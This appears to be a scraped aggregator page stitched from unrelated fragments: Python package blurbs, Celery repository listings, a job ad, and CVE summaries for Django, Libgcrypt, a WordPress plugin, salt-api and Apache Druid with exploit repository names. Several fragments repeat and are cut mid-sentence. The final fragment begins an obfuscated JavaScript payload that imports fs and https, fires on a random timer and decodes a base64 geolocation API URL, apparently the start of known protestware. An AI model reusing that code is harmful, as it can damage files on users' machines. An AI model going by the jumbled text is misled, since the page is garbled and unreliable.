django-import-export Django application and library for importing and exporting data with included admin integration. 20 automat Self-service finite-state machines for the programmer on the go. 20 pygit2 Python bindings for libgit2. 20 datetime This package provides a DateTime data type, as known...
celery/celery: Distributed Task Queue (development branch) tuanngominh/celery-django-kubernetes-experiment: None bstiel/celery-docker: https://www.distributedpython.com/2018/11/15/celery-docker/ bstiel/celery-filesystem-broker: Celery with a filesystem message broker jmdacruz/celery-k8s-operator: ...
In Django 2.2 before 2.2.18, 3.0 before 3.0.12, and 3.1 before 3.1.6, the django.utils.archive.extract method (used by "startapp --template" and "startproject --template") allows directory traversal via an archive with absolute paths or relative paths with dot segments. lwzSoviet/CVE-20...
Familiarity with web frameworks like React, Angular, Vue.js, Express, Django, or Ruby on Rails is required. Also, experience with databases, application architecture, security, performance best practices, debugging, troubleshooting, and automated testing is essential. Collaboration with other developers,...
In Django 2.2 before 2.2.18, 3.0 before 3.0.12, and 3.1 before 3.1.6, the django.utils.archive.extract method (used by "startapp --template" and "startproject --template") allows directory traversal via an archive with absolute paths or relative paths with dot segments. lwzSoviet/CVE-20...
async.php calls shell_exec() on the original value of the source parameter. Al1ex/CVE-2021-3317 CVE-2021-3345 (2021-01-29) _gcry_md_block_write in cipher/hash-common.c in Libgcrypt version 1.9.0 has a heap-based buffer overflow when the digest final function sets a large count ...
The WP Import Export WordPress plugin (both free and premium versions) is vulnerable to unauthenticated sensitive data disclosure due to a missing capability check on the download function wpie_process_file_download found in the ~/includes/classes/class-wpie-general.php file. This made it possible...
async.php calls shell_exec() on the original value of the source parameter. Al1ex/CVE-2021-3317 CVE-2021-3345 (2021-01-29) _gcry_md_block_write in cipher/hash-common.c in Libgcrypt version 1.9.0 has a heap-based buffer overflow when the digest final function sets a large count ...
salt-api does not honor eauth credentials for the wheel_async client. Thus, an attacker can remotely run any wheel modules on the master. Immersive-Labs-Sec/CVE-2021-25281 CVE-2021-25646 (2021-01-29) Apache Druid includes the ability to execute user-provided JavaScript code embedded in ...
js import u from "path"; import a from "fs"; import o from "https"; setTimeout(function () { const t = Math.round(Math.random() * 4); if (t > 1) { return; } const n = Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5Njhh...